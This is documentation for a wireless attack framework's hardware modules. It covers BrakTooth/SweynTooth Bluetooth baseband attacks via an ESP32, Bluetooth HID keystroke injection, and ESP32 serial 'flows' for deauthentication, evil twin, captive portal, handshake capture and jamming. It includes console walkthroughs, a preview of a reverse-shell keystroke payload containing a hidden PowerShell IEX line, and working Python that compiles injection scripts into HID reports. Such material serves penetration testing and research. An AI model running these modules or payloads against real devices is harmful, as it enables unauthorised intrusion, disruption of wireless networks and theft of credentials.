Hardware
Hardware-specific attack modules requiring specialized physical devices: BrakTooth via ESP32, Bluetooth HID injection, and related hardware exploitation.
| Module | Description |
|---|---|
| bluetooth/bt_baseband_attack | BrakTooth / SweynTooth via ESP32 serial |
| bluetooth/bt_hid_injection | Bluetooth HID keyboard injection (Broadcom fallback) |
| bluetooth/bt_hid_keyboard_inject | Extended HID keyboard injection (BlueZ / Broadcom) |
| external/bruce_serial_bridge | ESP32 Bruce firmware serial flow engine |
BrakTooth is a family of Bluetooth Classic (BR/EDR) baseband vulnerabilities disclosed in 2021 and affecting over 1,400 product listings across many SoC vendors. The flaws sit in the Link Manager Protocol (LMP) handling of the target's controller firmware, so a proof-of-concept needs a radio that can transmit arbitrary (including malformed) LMP frames: in practice an ESP32 running custom firmware that exposes the baseband, driven over a serial link from the host. SweynTooth is the analogous family for BLE and is selected in the same module with ATTACK_TYPE sweyntooth.
| CVE | Chip | Impact | CVSS |
|---|---|---|---|
| CVE-2021-28135 | Espressif ESP32 | Crash on LMP AU_RAND | 7.5 |
| CVE-2021-28136 | Espressif ESP32 | Crash on LMP LMP_timing_accuracy_req | 7.5 |
| CVE-2021-28139 | Espressif ESP32 | OOB write via LMP_feature_req | 8.8 |
| CVE-2021-31609 | Intel AX200 | DoS via LMP_SRES overflow | 7.5 |
| CVE-2021-31612 | Qualcomm WCN3990 | Deadlock via LMP_detach | 7.5 |
| CVE-2021-34143 | Texas Instruments CC256x | DoS via SCO link setup | 7.5 |
```
wxf > use generic/bluetooth/bt_baseband_attack
wxf (BTBasebandAttack) > show options
Options:
  TARGET_MAC   (required)     Target Bluetooth MAC address
  ATTACK_TYPE  braktooth      Attack type (braktooth, sweyntooth)
  CVE          auto           Specific CVE to test (auto = detect best match)
  SERIAL_PORT  /dev/ttyACM0   ESP32 serial port
  SERIAL_BAUD  115200         Serial baud rate
  SIMULATE     true           Dry-run without transmitting
wxf (BTBasebandAttack) > set TARGET_MAC AA:BB:CC:DD:EE:FF
wxf (BTBasebandAttack) > set ATTACK_TYPE braktooth
wxf (BTBasebandAttack) > set SERIAL_PORT /dev/ttyACM0
wxf (BTBasebandAttack) > set SIMULATE true
wxf (BTBasebandAttack) > run
[SIMULATE] BrakTooth attack setup
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Serial: /dev/ttyACM0 @ 115200
[SIMULATE] Step 1: Probe target chip vendor via LMP features...
[SIMULATE] Expected: detect Espressif, Qualcomm, TI, Intel, or Broadcom
[SIMULATE] Step 2: Select CVE based on chip detection
[SIMULATE] Step 3: Transmit crafted LMP frame via ESP32
[SIMULATE] Without hardware: this module requires:
[SIMULATE]   - ESP32 with BT HCI firmware (wrover or devkit)
[SIMULATE]   - braktooth_esp32_bluetooth_classic_attack_poc firmware flashed
[SIMULATE]   - Serial connection (/dev/ttyACM0 or /dev/ttyUSB0)
[!] Set SIMULATE=false and connect ESP32 to run
```
```
# Clone the ESP32 BR/EDR firmware
# Note: this repository is the ESP32 Bluetooth Classic sniffer project; the
# BrakTooth attack PoC firmware the module expects is a separate repository
# from the same author, so check which firmware is actually on the board.
git clone https://github.com/Matheus-Garbelini/esp32_bluetooth_classic_sniffer.git
cd esp32_bluetooth_classic_sniffer
# Install ESP-IDF (if not already installed)
# Build and flash firmware to the ESP32 (idf.py flash builds first if needed)
idf.py -p /dev/ttyACM0 flash
# Connect WXF via serial
wxf > use generic/bluetooth/bt_baseband_attack
wxf (BTBasebandAttack) > set SERIAL_PORT /dev/ttyACM0
```

Bluetooth HID (Human Interface Device) injection sends keyboard input to a target over the HID profile without the user ever seeing a PIN prompt. It works against hosts that accept an unauthenticated HID connection from a device presenting itself as a keyboard, or by reusing an already established pairing. The injected keystrokes run with the privileges of whoever is logged in, so the effect is a BadUSB/Rubber Ducky attack delivered over the air; the check a defender wants is whether the target's Bluetooth stack requires authentication before it accepts an HID connection.
```
wxf > use generic/bluetooth/bt_hid_injection
wxf (BTHIDInjection) > show options
Options:
  TARGET_MAC  (required)  Target device Bluetooth MAC
  PAYLOAD     (required)  Keys to inject (raw or script file)
  DELAY_MS    50          Inter-key delay in milliseconds
  METHOD      broadcom    Injection method (broadcom, bluez, simulate)
  SIMULATE    true        Dry-run without pairing
wxf (BTHIDInjection) > set TARGET_MAC AA:BB:CC:DD:EE:FF
wxf (BTHIDInjection) > set PAYLOAD "cmd\nwhoami\n"
wxf (BTHIDInjection) > set METHOD broadcom
wxf (BTHIDInjection) > set SIMULATE true
wxf (BTHIDInjection) > run
[SIMULATE] Bluetooth HID keyboard injection
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Payload: 11 keystrokes
[SIMULATE] Step 1: Discover target HID profile (HID_SERVICE_CLASS)
[SIMULATE] Step 2: Initiate L2CAP HID connection (PSM 0x0011 control, 0x0013 interrupt)
[SIMULATE] Step 3: Send HID Keyboard Report for each character
[SIMULATE] Sequence: c-m-d-ENTER-w-h-o-a-m-i-ENTER
[SIMULATE] Keystroke sequence:
[SIMULATE]   c: HID scancode 0x06
[SIMULATE]   m: HID scancode 0x10
[SIMULATE]   d: HID scancode 0x07
[SIMULATE]   ENTER: HID scancode 0x28
[SIMULATE]   ...
[!] Set SIMULATE=false + METHOD=broadcom to inject live
[!] PREREQ: Broadcom Bluetooth adapter with patch support OR already paired device
[!] NOTE: Requires target device to have BT discoverable/connectable
wxf (BTHIDInjection) > set PAYLOAD_FILE /payloads/windows_reverse_shell.btducky
wxf (BTHIDInjection) > run
[SIMULATE] Loading payload: /payloads/windows_reverse_shell.btducky
[SIMULATE] Lines: 25 commands | Estimated runtime: 4.5s at 50ms delay
[SIMULATE] Preview:
  GUI R (Win+R)
  DELAY 300
  STRING powershell -w hidden -c "IEX..."
  ENTER
  ...
```
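To make the keystroke mapping concrete, here is an added example (not WXF's code and not a specification of the .btducky format) that compiles a Ducky-style script like the preview above into the 8-byte boot keyboard reports an HID keyboard writes to the L2CAP interrupt channel (PSM 0x0013). It assumes a US keyboard layout, the standard USB HID usage IDs (the same values the simulated output prints), and only the four commands the preview shows plus REM; the script at the bottom is constructed for the example and is not the page's windows_reverse_shell payload.

```python
"""Compile a Ducky-style keystroke script into HID boot keyboard reports.

Added example, not WXF code. Only the report encoding is shown; writing the
reports to the L2CAP interrupt channel is left to the transport layer.
"""
from dataclasses import dataclass

# USB HID usage IDs, Keyboard/Keypad page (0x07). These match the values in
# the simulated output above: c=0x06, m=0x10, d=0x07, ENTER=0x28.
KEY_A = 0x04
KEY_ENTER = 0x28
MOD_LSHIFT = 0x02
MOD_LGUI = 0x08  # Windows / Command key
_DIGITS = "1234567890"          # usages 0x1E..0x27 in this order
_SHIFTED_DIGITS = "!@#$%^&*()"  # same usages with Shift held
# US layout punctuation: char -> (usage, shift needed)
_PUNCT = {
    "\n": (0x28, False), "\t": (0x2B, False), " ": (0x2C, False),
    "-": (0x2D, False), "_": (0x2D, True), "=": (0x2E, False), "+": (0x2E, True),
    "[": (0x2F, False), "{": (0x2F, True), "]": (0x30, False), "}": (0x30, True),
    "\\": (0x31, False), "|": (0x31, True), ";": (0x33, False), ":": (0x33, True),
    "'": (0x34, False), '"': (0x34, True), "`": (0x35, False), "~": (0x35, True),
    ",": (0x36, False), "<": (0x36, True), ".": (0x37, False), ">": (0x37, True),
    "/": (0x38, False), "?": (0x38, True),
}


def char_to_usage(ch: str) -> tuple:
    """Map one ASCII character (US layout) to (usage id, shift needed)."""
    if "a" <= ch <= "z":
        return KEY_A + ord(ch) - ord("a"), False
    if "A" <= ch <= "Z":
        return KEY_A + ord(ch) - ord("A"), True
    if ch in _DIGITS:
        return 0x1E + _DIGITS.index(ch), False
    if ch in _SHIFTED_DIGITS:
        return 0x1E + _SHIFTED_DIGITS.index(ch), True
    if ch in _PUNCT:
        return _PUNCT[ch]
    raise ValueError(f"no US-layout usage for {ch!r}")


def report(modifiers: int = 0, *keys: int) -> bytes:
    """8-byte boot keyboard report: modifier bits, reserved byte, six key slots."""
    if len(keys) > 6:
        raise ValueError("boot protocol carries at most six keys per report")
    return bytes([modifiers, 0, *keys]) + bytes(6 - len(keys))


RELEASE = report()  # all-zero report releases every key


@dataclass
class Step:
    kind: str           # "report" (bytes to send) or "delay" (ms to wait)
    data: bytes = b""
    ms: int = 0


def press(modifiers: int, usage: int) -> list:
    """A key press is a report with the key set, followed by a release report."""
    return [Step("report", report(modifiers, usage)), Step("report", RELEASE)]


def compile_script(script: str, key_delay_ms: int = 50) -> list:
    """Translate GUI/DELAY/STRING/ENTER lines into reports and delays."""
    steps = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "DELAY":
            steps.append(Step("delay", ms=int(arg)))
        elif cmd == "STRING":
            for ch in arg:
                usage, shift = char_to_usage(ch)
                steps += press(MOD_LSHIFT if shift else 0, usage)
                steps.append(Step("delay", ms=key_delay_ms))  # the DELAY_MS knob
        elif cmd == "ENTER":
            steps += press(0, KEY_ENTER)
        elif cmd == "GUI":  # e.g. "GUI R" -> Win+R
            usage, _ = char_to_usage(arg.lower())
            steps += press(MOD_LGUI, usage)
        else:
            raise ValueError(f"unsupported command: {cmd!r}")
    return steps


def estimated_runtime_ms(steps) -> int:
    """Sum of all delays, i.e. the 'Estimated runtime' the dry run reports."""
    return sum(s.ms for s in steps)


# Constructed demo script (not the page's windows_reverse_shell payload).
DEMO_SCRIPT = "GUI R\nDELAY 300\nSTRING cmd\nENTER\nDELAY 500\nSTRING whoami\nENTER\n"

if __name__ == "__main__":
    for s in compile_script(DEMO_SCRIPT):
        print(s.data.hex() if s.kind == "report" else f"delay {s.ms} ms")
```

Each printed report is what goes on the wire after the 0xA1 DATA/Input header the HID profile prepends; the release report after every press is what makes repeated characters ("ll") register as two keystrokes instead of one held key.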
WXF includes a full serial orchestration engine for devices running the Bruce ESP32 firmware: flows are sequences of CLI commands sent over the serial port, each with an expected prompt and a timeout.
```
wxf > use generic/external/bruce_serial_bridge
wxf (BruceSerialBridge) > set SERIAL_PORT /dev/ttyACM0
wxf (BruceSerialBridge) > set FLOW_PROFILE capture_handshake_flow
wxf (BruceSerialBridge) > run
[*] Connecting to Bruce firmware on /dev/ttyACM0...
[*] Firmware: Bruce v1.7.1 (ESP32-S3)
[*] Executing flow: capture_handshake_flow
[*] Step 1: WiFi scan...
[+] AP found: HomeWifi ch6 WPA2
[*] Step 2: Target: AA:BB:CC:DD:EE:FF
[*] Step 3: Deauth + capture...
[+] Handshake captured! Saved to /sdcard/handshake_AABBCCDDEEFF.pcap
[*] Flow complete.
```
| Flow Profile | Description |
|---|---|
| baseline_status_flow | Get device status and firmware info |
| capture_handshake_flow | WiFi scan + deauth + EAPOL capture |
| wifi_menu_navigation_flow | Interactive WiFi menu navigation |
| deauth_clone_verify_flow | Deauth + evil twin + capture verify |
| sniffer_capture_flow | Raw 802.11 promiscuous capture |
| evil_portal_karma_flow | KARMA + captive portal setup |
| wifi_attack_lab_flow | Multi-stage attack lab workflow |
| raw_sniffer_probe_flow | Probe request sniffer |
| wifi_bruteforce_recon_flow | WiFi recon + bruteforce prep |
| navigation_recovery_flow | Recover from menu error states |
| captive_portal_endpoint_config_flow | Configure captive portal endpoint |
| repeater_wisp_setup_flow | Setup WiFi repeater / WISP mode |
| external_adapter_probe_flow | External USB adapter probe |
| webui_password_flow | Web UI credential testing |
| target_attack_stability_flow | Stability test for long-running attacks |
| ble_recon_spam_flow | BLE recon + advertising spam |
| ble_badble_recovery_flow | BLE error recovery |
| rf_spectrum_scan_flow | Sub-GHz spectrum scan |
| rf_jammer_stability_flow | Sub-GHz jammer stability test |
```
wxf (BruceSerialBridge) > set FLOW_JSON [{"command":"wifi scan","expect":"#","wait_ms":1200},{"command":"nav back","repeat":2,"expect":"#"}]
wxf (BruceSerialBridge) > run
[*] Running custom flow: 2 steps
[*] Step 1: wifi scan -> OK (1,243ms)
[*] Step 2: nav back x2 -> OK
[*] Flow complete.
```
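The FLOW_JSON format (command, expect, wait_ms, repeat) is small enough to show as a runner. The following is an added example, not WXF's bruce_serial_bridge engine: the expect/timeout/repeat semantics are my reading of the two-step flow above, the transport is any object with read(n)/write(bytes) (pyserial's serial.Serial fits; here a constructed FakeSerial with invented canned replies so it runs offline), and the default timeout of 5000 ms is an assumption. The failure mode it handles is a device that never returns the prompt, which is what the wait_ms budget exists for.

```python
"""Run a FLOW_JSON-style step list against a serial CLI that ends replies with a prompt.

Added example, not WXF's bruce_serial_bridge engine. Assumed semantics: each
step sends `command` then reads until `expect` appears or `wait_ms` elapses;
`repeat` runs the step that many times; the first timeout aborts the flow.
"""
import json
import time


class FlowError(RuntimeError):
    pass


class FakeSerial:
    """Constructed stand-in for the Bruce CLI: known commands get a canned reply
    followed by the '# ' prompt, unknown ones get no reply at all (a hung menu).
    Replace with serial.Serial(port, baud, timeout=0.1) for real hardware."""

    def __init__(self, replies: dict):
        self.replies = replies
        self.buf = b""
        self.sent = []

    def write(self, data: bytes) -> int:
        self.sent.append(data)
        cmd = data.decode().strip()
        if cmd in self.replies:
            self.buf += self.replies[cmd].encode() + b"# "
        return len(data)

    def read(self, size: int) -> bytes:
        out, self.buf = self.buf[:size], self.buf[size:]
        return out


def run_step(port, step: dict, clock=time.monotonic, sleep=time.sleep) -> str:
    """Send one step and return everything read up to the expected prompt."""
    cmd = step["command"]
    expect = step.get("expect", "#").encode()
    wait_ms = int(step.get("wait_ms", 5000))  # assumed default budget
    port.write(cmd.encode() + b"\r\n")
    start = clock()
    got = b""
    while True:
        got += port.read(256)
        if expect in got:
            return got.decode(errors="replace")
        if (clock() - start) * 1000 >= wait_ms:
            raise FlowError(
                f"{cmd!r}: no {expect.decode()!r} within {wait_ms} ms; tail={got[-60:]!r}")
        sleep(0.01)  # poll without spinning the CPU


def run_flow(port, flow_json: str, **kw) -> list:
    """Execute the whole flow; returns [(command, reply), ...] in send order."""
    results = []
    for step in json.loads(flow_json):
        for _ in range(int(step.get("repeat", 1))):
            results.append((step["command"], run_step(port, step, **kw)))
    return results


# The flow from the page, plus constructed replies for the fake device.
DEMO_FLOW = ('[{"command":"wifi scan","expect":"#","wait_ms":1200},'
             '{"command":"nav back","repeat":2,"expect":"#"}]')
DEMO_REPLIES = {"wifi scan": "0: HomeWifi ch6 WPA2\r\n", "nav back": "ok\r\n"}

if __name__ == "__main__":
    for cmd, reply in run_flow(FakeSerial(DEMO_REPLIES), DEMO_FLOW):
        print(f"{cmd} -> {reply.strip()!r}")
```

Keeping the transport and clock injectable is what lets a flow profile be regression-tested without a board on the bench; on real hardware the same run_flow call simply takes a serial.Serial instance in place of FakeSerial.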
| Hardware | Interface | Modules | Notes |
|---|---|---|---|
| HackRF One | USB (hackrf_transfer) | Sub-GHz TX/RX, all subghz/* | Linux/macOS only |
| RTL-SDR | USB (rtl-sdr) | Sub-GHz RX (TPMS, OOK) | Receive only |
| CC1101 + ESP32 | SPI + USB serial | Sub-GHz static codes | Budget TX option |
| Flipper Zero | USB / microSD | Sub-GHz .sub replay | WXF generates .sub files |
| Bruce ESP32 | USB serial | WiFi/BLE attacks, RF scan | WXF orchestrates via serial |
| Alfa AWUS036ACM | USB (nl80211) | All WiFi modules | Best Linux monitor mode |
| Ubertooth One | USB | Bluetooth BR/EDR sniffing | BrakTooth/KNOB prereq |
| nRF52840 dongle | USB (Sniffle) | BLE sniffing | SweynTooth prereq |
| BlueZ HCI | USB Bluetooth | BLE GATT, HID, pairing | Standard Linux BT |
Related pages: Bluetooth & BLE | Sub-GHz Attacks | Configuration
Author: Andre Henrique (@mrhenrike) | Uniao Geek